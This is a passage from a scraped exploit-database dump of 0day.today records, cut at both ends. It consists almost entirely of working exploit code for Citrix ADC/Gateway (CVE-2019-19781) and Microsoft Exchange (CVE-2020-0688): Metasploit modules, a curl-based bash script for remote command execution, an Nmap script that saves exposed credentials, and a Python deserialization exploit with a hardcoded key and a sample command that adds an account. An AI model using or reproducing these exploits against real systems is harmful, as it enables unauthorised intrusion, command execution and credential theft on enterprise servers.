'Notes' => {\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION],\r\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\r\n }\r\n ))\r\n\r\n register_options([\r\n OptAddress.new('RHOST', [true, 'The target address'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptBool.new('ForceExploit', [false, 'Override check result', false])\r\n ])\r\n\r\n deregister_options('RHOSTS')\r\n end\r\n\r\n def execute_command(command, opts = {})\r\n filename = Rex::Text.rand_text_alpha(16)\r\n nonce = Rex::Text.rand_text_alpha(6)\r\n\r\n request = {\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'),\r\n 'headers' => {\r\n 'NSC_USER' => '../../../netscaler/portal/templates/' + filename,\r\n 'NSC_NONCE' => nonce\r\n },\r\n 'vars_post' => {\r\n 'url' => 'http://127.0.0.1',\r\n 'title' => \"[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]\",\r\n 'desc' => 'desc',\r\n 'UI_inuse' => 'RfWeb'\r\n },\r\n 'encode_params' => false\r\n }\r\n\r\n begin\r\n received = send_request_cgi(request)\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n return false unless received\r\n\r\n if received.code == 200\r\n vprint_status(\"#{received.get_html_document.text}\")\r\n sleep 2\r\n\r\n request = {\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'),\r\n 'headers' => {\r\n 'NSC_USER' => nonce,\r\n 'NSC_NONCE' => nonce\r\n }\r\n }\r\n\r\n ## Trigger to gain exploitation.\r\n begin\r\n send_request_cgi(request)\r\n received = send_request_cgi(request)\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n return false unless received\r\n return received\r\n end\r\n\r\n return false\r\n end\r\n\r\n def get_chr_payload(command)\r\n chr_payload = command\r\n i = chr_payload.length\r\n\r\n output = \"\"\r\n chr_payload.each_char do | c |\r\n i = i - 1\r\n output << \"chr(\" << c.ord.to_s << \")\"\r\n if i != 0\r\n output << \" . \"\r\n end\r\n end\r\n\r\n return output\r\n end\r\n\r\n def check\r\n begin\r\n received = send_request_cgi(\r\n \"method\" => \"GET\",\r\n \"uri\" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf')\r\n )\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n\r\n if received && received.code != 200\r\n return Exploit::CheckCode::Safe\r\n end\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n unless check.eql? Exploit::CheckCode::Vulnerable\r\n unless datastore['ForceExploit']\r\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\r\n end\r\n else\r\n print_good('The target appears to be vulnerable.')\r\n end\r\n\r\n case target['Type']\r\n when :cmd_generic\r\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\r\n vprint_status(\"Generated command payload: #{payload.encoded}\")\r\n\r\n received = execute_command(payload.encoded)\r\n if (received) && (datastore['PAYLOAD'] == \"cmd/unix/generic\")\r\n print_warning('Dumping command output in parsed http response')\r\n print_good(\"#{received.get_html_document.text}\")\r\n else\r\n print_warning('Empty response, no command output')\r\n return\r\n end\r\n\r\n when :cmd_shell\r\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\r\n vprint_status(\"Generated command payload: #{payload.encoded}\")\r\n\r\n execute_command(payload.encoded)\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2020-01-19] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33806"}, {"lastseen": "2020-01-19T23:06:56", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category web applications", "modified": "2020-01-11T00:00:00", "published": "2020-01-11T00:00:00", "id": "1337DAY-ID-33794", "href": "https://0day.today/exploit/description/33794", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution Vulnerability (1)", "type": "zdt", "sourceData": "#!/bin/bash\r\n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781\r\n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'\r\n# Release Date : 11/01/2020\r\n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia\r\necho \"=================================================================================\r\n ___ _ _ ____ ___ _ _\r\n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _\r\n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' |\r\n|_| |_| \\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_|\r\n |__/ CVE-2019-19781\r\n=================================================================================\"\r\n##############################\r\nif [ -z \"$1\" ];\r\nthen\r\necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n'\r\nexit;\r\nfi\r\nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);\r\ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d \"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is\r\necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\r\necho -ne \"Command Output :\\n\"\r\ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\n\n# 0day.today [2020-01-19] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33794"}, {"lastseen": "2020-01-19T23:02:20", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category web applications", "modified": "2020-01-16T00:00:00", "published": "2020-01-16T00:00:00", "id": "1337DAY-ID-33824", "href": "https://0day.today/exploit/description/33824", "title": "Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal Exploit", "type": "zdt", "sourceData": "# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal\r\n# CVE: CVE-2019-19781\r\n# Vulenrability: Path Traversal\r\n# Vulnerablity Discovery: Mikhail Klyuchnikov\r\n# Exploit Author: Dhiraj Mishra\r\n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0\r\n# Vendor Homepage: https://www.citrix.com/\r\n# References: https://support.citrix.com/article/CTX267027\r\n# https://github.com/nmap/nmap/pull/1893\r\n\r\nlocal http = require \"http\"\r\nlocal stdnse = require \"stdnse\"\r\nlocal shortport = require \"shortport\"\r\nlocal table = require \"table\"\r\nlocal string = require \"string\"\r\nlocal vulns = require \"vulns\"\r\nlocal nmap = require \"nmap\"\r\nlocal io = require \"io\"\r\n\r\ndescription = [[\r\nThis NSE script checks whether the traget server is vulnerable to\r\nCVE-2019-19781\r\n]]\r\n---\r\n-- @usage\r\n-- nmap --script https-citrix-path-traversal -p <port> <host>\r\n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args\r\noutput='file.txt'\r\n-- @output\r\n-- PORT STATE SERVICE\r\n-- 443/tcp open http\r\n-- | CVE-2019-19781:\r\n-- | Host is vulnerable to CVE-2019-19781\r\n-- @changelog\r\n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)\r\n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)\r\n-- @xmloutput\r\n-- <table key=\"NMAP-1\">\r\n-- <elem key=\"title\">Citrix ADC Path Traversal aka (Shitrix)</elem>\r\n-- <elem key=\"state\">VULNERABLE</elem>\r\n-- <table key=\"description\">\r\n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,\r\n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path\r\n-- traversal vulnerability that allows attackers to read configurations or\r\nany other file.\r\n-- </table>\r\n-- <table key=\"dates\">\r\n-- <table key=\"disclosure\">\r\n-- <elem key=\"year\">2019</elem>\r\n-- <elem key=\"day\">17</elem>\r\n-- <elem key=\"month\">12</elem>\r\n-- </table>\r\n-- </table>\r\n-- <elem key=\"disclosure\">17-12-2019</elem>\r\n-- <table key=\"extra_info\">\r\n-- </table>\r\n-- <table key=\"refs\">\r\n-- <elem>https://support.citrix.com/article/CTX267027</elem>\r\n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>\r\n-- </table>\r\n-- </table>\r\n\r\nauthor = \"Dhiraj Mishra (@RandomDhiraj)\"\r\nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\"\r\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\r\ncategories = {\"discovery\", \"intrusive\",\"vuln\"}\r\n\r\nportrule = shortport.ssl\r\n\r\naction = function(host,port)\r\n local outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil\r\n local vuln = {\r\n title = 'Citrix ADC Path Traversal',\r\n state = vulns.STATE.NOT_VULN,\r\n description = [[\r\nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,\r\n12.1, and 13.0 are vulnerable\r\nto a unauthenticated path traversal vulnerability that allows attackers to\r\nread configurations or any other file.\r\n ]],\r\n references = {\r\n 'https://support.citrix.com/article/CTX267027',\r\n 'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',\r\n },\r\n dates = {\r\n disclosure = {year = '2019', month = '12', day = '17'},\r\n },\r\n }\r\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\r\n local path = \"/vpn/../vpns/cfg/smb.conf\"\r\n local response\r\n local output = {}\r\n local success = \"Host is vulnerable to CVE-2019-19781\"\r\n local fail = \"Host is not vulnerable\"\r\n local match = \"[global]\"\r\n local credentials\r\n local citrixADC\r\n response = http.get(host, port.number, path)\r\n\r\n if not response.status then\r\n stdnse.print_debug(\"Request Failed\")\r\n return\r\n end\r\n if response.status == 200 then\r\n if string.match(response.body, match) then\r\n stdnse.print_debug(\"%s: %s GET %s - 200 OK\",\r\nSCRIPT_NAME,host.targetname or host.ip, path)\r\n vuln.state = vulns.STATE.VULN\r\n citrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname\r\nor host.ip,port.number, path))\r\n if outputFile then\r\n credentials = response.body:gsub('%W','.')\r\nvuln.check_results = stdnse.format_output(true, citrixADC)\r\n vuln.extra_info = stdnse.format_output(true, \"Credentials are being\r\nstored in the output file\")\r\nfile = io.open(outputFile, \"a\")\r\nfile:write(credentials, \"\\n\")\r\n else\r\n vuln.check_results = stdnse.format_output(true, citrixADC)\r\n end\r\n end\r\n elseif response.status == 403 then\r\n stdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname\r\nor host.ip, path, response.status)\r\n vuln.state = vulns.STATE.NOT_VULN\r\n end\r\n\r\n return vuln_report:make_output(vuln)\r\nend\n\n# 0day.today [2020-01-19] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33824"}, {"lastseen": "2020-03-05T03:14:28", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a .NET serialization vulnerability in the Exchange Control Panel (ECP) web page. The vulnerability is due to Microsoft Exchange Server not randomizing the keys on a per-installation basis resulting in them using the same validationKey and decryptionKey values. With knowledge of these, values an attacker can craft a special viewstate to cause an OS command to be executed by NT_AUTHORITY\\SYSTEM using .NET deserialization.", "modified": "2020-03-05T00:00:00", "published": "2020-03-05T00:00:00", "id": "1337DAY-ID-34051", "href": "https://0day.today/exploit/description/34051", "title": "Exchange Control Panel Viewstate Deserialization Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'bindata'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n # include Msf::Auxiliary::Report\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n\r\n DEFAULT_VIEWSTATE_GENERATOR = 'B97B4E27'\r\n VALIDATION_KEY = \"\\xcb\\x27\\x21\\xab\\xda\\xf8\\xe9\\xdc\\x51\\x6d\\x62\\x1d\\x8b\\x8b\\xf1\\x3a\\x2c\\x9e\\x86\\x89\\xa2\\x53\\x03\\xbf\"\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exchange Control Panel Viewstate Deserialization',\r\n 'Description' => %q{\r\n This module exploits a .NET serialization vulnerability in the\r\n Exchange Control Panel (ECP) web page. The vulnerability is due to\r\n Microsoft Exchange Server not randomizing the keys on a\r\n per-installation basis resulting in them using the same validationKey\r\n and decryptionKey values. With knowledge of these, values an attacker\r\n can craft a special viewstate to cause an OS command to be executed\r\n by NT_AUTHORITY\\SYSTEM using .NET deserialization.\r\n },\r\n 'Author' => 'Spencer McIntyre',\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n ['CVE', '2020-0688'],\r\n ['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'],\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows (x86)', { 'Arch' => ARCH_X86 } ],\r\n [ 'Windows (x64)', { 'Arch' => ARCH_X64 } ],\r\n [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true\r\n },\r\n 'DefaultTarget' => 1,\r\n 'DisclosureDate' => '2020-02-11',\r\n 'Notes' =>\r\n {\r\n 'Stability' => [ CRASH_SAFE, ],\r\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],\r\n 'Reliability' => [ REPEATABLE_SESSION, ],\r\n }\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(443),\r\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\r\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\r\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\r\n ])\r\n\r\n register_advanced_options([\r\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),\r\n ])\r\n end\r\n\r\n def check\r\n state = get_request_setup\r\n viewstate = state[:viewstate]\r\n return CheckCode::Unknown if viewstate.nil?\r\n\r\n viewstate = Rex::Text.decode_base64(viewstate)\r\n body = viewstate[0...-20]\r\n signature = viewstate[-20..-1]\r\n\r\n unless generate_viewstate_signature(state[:viewstate_generator], state[:session_id], body) == signature\r\n return CheckCode::Safe\r\n end\r\n\r\n # we've validated the signature matches based on the data we have and thus\r\n # proven that we are capable of signing a viewstate ourselves\r\n CheckCode::Vulnerable\r\n end\r\n\r\n def generate_viewstate(generator, session_id, cmd)\r\n viewstate = ::Msf::Util::DotNetDeserialization.generate(cmd)\r\n signature = generate_viewstate_signature(generator, session_id, viewstate)\r\n Rex::Text.encode_base64(viewstate + signature)\r\n end\r\n\r\n def generate_viewstate_signature(generator, session_id, viewstate)\r\n mac_key_bytes = Rex::Text.hex_to_raw(generator).unpack('I<').pack('I>')\r\n mac_key_bytes << Rex::Text.to_unicode(session_id)\r\n OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), VALIDATION_KEY, viewstate + mac_key_bytes)\r\n end\r\n\r\n def exploit\r\n state = get_request_setup\r\n\r\n # the major limit is the max length of a GET request, the command will be\r\n # XML escaped and then base64 encoded which both increase the size\r\n if target.arch.first == ARCH_CMD\r\n execute_command(payload.encoded, opts={state: state})\r\n else\r\n cmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first\r\n execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state})\r\n end\r\n end\r\n\r\n def execute_command(cmd, opts)\r\n state = opts[:state]\r\n viewstate = generate_viewstate(state[:viewstate_generator], state[:session_id], cmd)\r\n 5.times do |iteration|\r\n # this request *must* be a GET request, can't use POST to use a larger viewstate\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\r\n 'cookie' => state[:cookies].join(''),\r\n 'agent' => state[:user_agent],\r\n 'vars_get' => {\r\n '__VIEWSTATE' => viewstate,\r\n '__VIEWSTATEGENERATOR' => state[:viewstate_generator]\r\n }\r\n })\r\n break\r\n rescue Rex::ConnectionError, Errno::ECONNRESET => e\r\n vprint_warning('Encountered a connection error while sending the command, sleeping before retrying')\r\n sleep iteration\r\n end\r\n end\r\n\r\n def get_request_setup\r\n # need to use a newer default user-agent than what Metasploit currently provides\r\n # see: https://docs.microsoft.com/en-us/microsoft-edge/web-platform/user-agent-string\r\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43'\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'owa', 'auth.owa'),\r\n 'method' => 'POST',\r\n 'agent' => user_agent,\r\n 'vars_post' => {\r\n 'password' => datastore['PASSWORD'],\r\n 'flags' => '4',\r\n 'destination' => full_uri(normalize_uri(target_uri.path, 'owa')),\r\n 'username' => datastore['USERNAME']\r\n }\r\n })\r\n fail_with(Failure::Unreachable, 'The initial HTTP request to the server failed') if res.nil?\r\n cookies = [res.get_cookies]\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\r\n 'cookie' => res.get_cookies,\r\n 'agent' => user_agent\r\n })\r\n fail_with(Failure::UnexpectedReply, 'Failed to get the __VIEWSTATEGENERATOR page') unless res && res.code == 200\r\n cookies << res.get_cookies\r\n\r\n viewstate_generator = res.body.scan(/id=\"__VIEWSTATEGENERATOR\"\\s+value=\"([a-fA-F0-9]{8})\"/).flatten[0]\r\n if viewstate_generator.nil?\r\n print_warning(\"Failed to find the __VIEWSTATEGENERATOR, using the default value: #{DEFAULT_VIEWSTATE_GENERATOR}\")\r\n viewstate_generator = DEFAULT_VIEWSTATE_GENERATOR\r\n else\r\n vprint_status(\"Recovered the __VIEWSTATEGENERATOR: #{viewstate_generator}\")\r\n end\r\n\r\n viewstate = res.body.scan(/id=\"__VIEWSTATE\"\\s+value=\"([a-zA-Z0-9\\+\\/]+={0,2})\"/).flatten[0]\r\n if viewstate.nil?\r\n vprint_warning('Failed to find the __VIEWSTATE value')\r\n end\r\n\r\n session_id = res.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0]\r\n if session_id.nil?\r\n fail_with(Failure::UnexpectedReply, 'Failed to get the ASP.NET_SessionId from the response cookies')\r\n end\r\n vprint_status(\"Recovered the ASP.NET_SessionID: #{session_id}\")\r\n\r\n {user_agent: user_agent, cookies: cookies, viewstate: viewstate, viewstate_generator: viewstate_generator, session_id: session_id}\r\n end\r\nend\n\n# 0day.today [2020-03-05] #", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34051"}, {"lastseen": "2020-03-04T17:20:27", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2020-03-02T00:00:00", "published": "2020-03-02T00:00:00", "id": "1337DAY-ID-34037", "href": "https://0day.today/exploit/description/34037", "title": "Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution Exploit", "type": "zdt", "sourceData": "# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution\r\n# Exploit Author: Photubias\r\n# Vendor Advisory: [1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688\r\n# [2] https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys\r\n# Vendor Homepage: https://www.microsoft.com\r\n# Version: MS Exchange Server 2010 SP3 up to 2019 CU4\r\n# Tested on: MS Exchange 2019 v15.2.221.12 running on Windows Server 2019\r\n# CVE: CVE-2020-0688\r\n\r\n#! /usr/bin/env python\r\n# -*- coding: utf-8 -*- \r\n''' \r\n\r\n \r\n\tCopyright 2020 Photubias(c)\r\n\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see <http://www.gnu.org/licenses/>.\r\n \r\n File name CVE-2020-0688-Photubias.py\r\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\r\n\r\n This is a native implementation without requirements, written in Python 2.\r\n Works equally well on Windows as Linux (as MacOS, probably ;-)\r\n Reverse Engineered Serialization code from https://github.com/pwntester/ysoserial.net\r\n\r\n Example Output:\r\n CVE-2020-0688-Photubias.py -t https://10.11.12.13 -u sean -c \"net user pwned pwned /add\"\r\n [+] Login worked\r\n [+] Got ASP.NET Session ID: 83af2893-6e1c-4cee-88f8-b706ebc77570\r\n [+] Detected OWA version number 15.2.221.12\r\n [+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!\r\n [+] All looks OK, ready to send exploit (net user pwned pwned /add)? [Y/n]:\r\n [+] Got Payload: /wEy0QYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADzBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIm5ldCB1c2VyIHB3bmVkIHB3bmVkIC9hZGQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5PgvjXlpQBwdP741icUH6Wivr7TlI6g==\r\n Sending now ...\r\n'''\r\nimport urllib2, urllib, base64, binascii, hashlib, hmac, struct, argparse, sys, cookielib, ssl, getpass\r\n\r\n## STATIC STRINGS\r\n# This string acts as a template for the serialization (contains \"###payload###\" to be replaced and TWO size locations)\r\nstrSerTemplate = base64.b64decode('/wEy2gYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAD8BDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIiMjI3BheWxvYWQjIyMiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgs=')\r\n# This is a key installed in the Exchange Server, it is changeable, but often not (part of the vulnerability)\r\nstrSerKey = binascii.unhexlify('CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF')\r\n\r\ndef convertInt(iInput, length): \r\n return struct.pack(\"<I\" , int(iInput)).encode('hex')[:length]\r\n\r\ndef getYsoserialPayload(sCommand, sSessionId):\r\n ## PART1 of the payload to hash\r\n strPart1 = strSerTemplate.replace('###payload###', sCommand)\r\n ## Fix the length fields\r\n #print(binascii.hexlify(strPart1[3]+strPart1[4])) ## 'da06' > '06da' (0x06b8 + len(sCommand))\r\n #print(binascii.hexlify(strPart1[224]+strPart1[225])) ## 'fc04' > '04fc' (0x04da + len(sCommand))\r\n strLength1 = convertInt(0x06b8 + len(sCommand),4)\r\n strLength2 = convertInt(0x04da + len(sCommand),4)\r\n strPart1 = strPart1[:3] + binascii.unhexlify(strLength1) + strPart1[5:]\r\n strPart1 = strPart1[:224] + binascii.unhexlify(strLength2) + strPart1[226:]\r\n \r\n ## PART2 of the payload to hash\r\n strPart2 = '274e7bb9'\r\n for v in sSessionId: strPart2 += binascii.hexlify(v)+'00'\r\n strPart2 = binascii.unhexlify(strPart2)\r\n \r\n strMac = hmac.new(strSerKey, strPart1 + strPart2, hashlib.sha1).hexdigest()\r\n strResult = base64.b64encode(strPart1 + binascii.unhexlify(strMac))\r\n return strResult\r\n\r\ndef verifyLogin(sTarget, sUsername, sPassword, oOpener, oCookjar):\r\n if not sTarget[-1:] == '/': sTarget += '/'\r\n ## Verify Login\r\n lPostData = {'destination' : sTarget, 'flags' : '4', 'forcedownlevel' : '0', 'username' : sUsername, 'password' : sPassword, 'passwordText' : '', 'isUtf8' : '1'}\r\n try: sResult = oOpener.open(urllib2.Request(sTarget + 'owa/auth.owa', data=urllib.urlencode(lPostData), headers={'User-Agent':'Python'})).read()\r\n except: print('[!] Error, ' + sTarget + ' not reachable')\r\n bLoggedIn = False\r\n for cookie in oCookjar:\r\n if cookie.name == 'cadata': bLoggedIn = True\r\n if not bLoggedIn:\r\n print('[-] Login Wrong, too bad')\r\n exit(1)\r\n print('[+] Login worked')\r\n\r\n ## Verify Session ID\r\n sSessionId = ''\r\n sResult = oOpener.open(urllib2.Request(sTarget+'ecp/default.aspx', headers={'User-Agent':'Python'})).read()\r\n for cookie in oCookjar:\r\n if 'SessionId' in cookie.name: sSessionId = cookie.value\r\n print('[+] Got ASP.NET Session ID: ' + sSessionId)\r\n\r\n ## Verify OWA Version\r\n sVersion = ''\r\n try: sVersion = 